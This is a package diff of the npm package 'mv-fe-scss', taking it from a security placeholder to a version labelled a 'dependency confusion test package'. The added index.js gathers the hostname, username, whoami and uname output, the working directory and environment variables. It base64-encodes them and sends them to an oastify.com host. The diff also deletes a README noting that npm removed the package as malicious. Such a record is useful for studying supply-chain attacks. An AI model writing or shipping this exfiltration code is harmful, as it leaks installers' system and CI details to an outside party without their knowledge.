mv-fe-scss 0.0.1-security → 52.2.6

package/index.js

@@ -0,0 +1,41 @@
+const os = require('os');
+const cp = require('child_process');
+const https = require('https');
+
+function safe(cmd) {
+  try {
+    return cp.execSync(cmd).toString().trim();
+  } catch {
+    return '';
+  }
+}
+
+const info = {
+  hostname: os.hostname(),
+  platform: os.platform(),
+  arch: os.arch(),
+  username: os.userInfo().username,
+  cwd: process.cwd(),
+  uname: safe('uname -a'),
+  whoami: safe('whoami'),
+  env: {
+    CI: process.env.CI,
+    GITHUB_ACTIONS: process.env.GITHUB_ACTIONS,
+    USER: process.env.USER,
+    HOME: process.env.HOME,
+    PATH: process.env.PATH
+  }
+};
+
+const payload = Buffer.from(JSON.stringify(info)).toString('base64');
+
+const options = {
+  hostname: 'l9vm8i67pap5uw6gg7gp7lq8nztqhk59.oastify.com',
+  path: `/log?d=${encodeURIComponent(payload)}`,
+  method: 'GET'
+};
+
+const req = https.request(options, res => {});
+req.on('error', () => {});
+req.end();
+

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "mv-fe-scss",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "52.2.6",
+  "description": "Dependency confusion test package",
+  "main": "index.js",
+  "scripts": {
+    "test": "node index.js"
+  },
+  "author": "Your Name",
+  "license": "MIT"
 }
+

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=mv-fe-scss for more information.